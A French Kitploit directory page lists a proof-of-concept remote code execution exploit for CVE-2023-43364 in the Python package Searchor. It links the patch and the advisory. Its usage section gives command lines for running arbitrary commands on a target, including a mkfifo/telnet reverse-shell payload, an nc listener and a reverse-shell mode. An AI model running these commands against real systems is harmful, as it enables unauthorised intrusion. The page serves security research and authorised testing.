Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-43364-Searchor-RCE-Exploit — POC exploit via unsafe `eval()` usage in Searchor (< 2.4.2) | Kitploit
Outils/GitHubGitHub/herick-costa/cve-2023-43364-searchor-rce-exploit
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubherick-costa/cve-2023-43364-searchor-rce-exploit

CVE-2023-43364-Searchor-RCE-Exploit

POC exploit via unsafe `eval()` usage in Searchor (< 2.4.2)

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
1il y a 1 moisPas encore vérifié

CVE-2023-43364 – Exploit RCE de Searchor (PoC)

Exécution de code à distance (RCE) via l'utilisation non sécurisée de eval() dans Searchor (< 2.4.2)

Aperçu

Ce projet démontre l'exploitation de CVE-2023-43364, une vulnérabilité d'exécution de code à distance (RCE) affectant le package Python Searchor (< 2.4.2).

Le problème est causé par l'utilisation non sécurisée de eval() sur une entrée contrôlée par l'utilisateur, permettant aux attaquants d'injecter et d'exécuter du code Python arbitraire.

La vulnérabilité a été corrigée en supprimant l'utilisation non sécurisée de eval(), comme le montre le correctif officiel :

  • https://github.com/ArjunSharda/Searchor/commit/16016506f7bf92b0f21f51841d599126d6fcd15b

Informations techniques supplémentaires et avis :

  • https://github.com/advisories/GHSA-66m2-493m-crh2

Cette preuve de concept fournit plusieurs méthodes d'exécution, notamment l'exécution de commandes, la validation de test et les shells inversés.

Utilisation

Test RCE

Exécutez une commande simple (id) pour vérifier l'exécution du code :

root@kitploit:~
python3 CVE-2023-43364.py <URL> --test

Exécutez une commande personnalisée Exécutez n'importe quelle commande sur le serveur cible :

root@kitploit:~
python3 CVE-2023-43364.py <URL> -a "whoami"

Exemples :

root@kitploit:~
python3 CVE-2023-43364.py <URL> -a "TF=$(mktemp -u);mkfifo $TF && telnet IP PORT 0<$TF | sh 1>$TF"
python3 CVE-2023-43364.py <URL> -a "ls -la"

Shell inversé Démarrez un écouteur sur votre machine :

root@kitploit:~
nc -lvnp 4444

Exécutez l'exploit :

root@kitploit:~
python3 CVE-2023-43364.py <URL> <LHOST>

⚠️ Avertissement

Ce projet est destiné à :

  • des fins éducatives
  • la recherche en sécurité
  • uniquement des tests de pénétration autorisés

L'auteur n'est pas responsable de toute mauvaise utilisation ou des dommages causés par cet outil.

Utilisez cet exploit uniquement dans des environnements contrôlés ou sur des systèmes pour lesquels vous avez une autorisation explicite de test.

Télécharger l’outil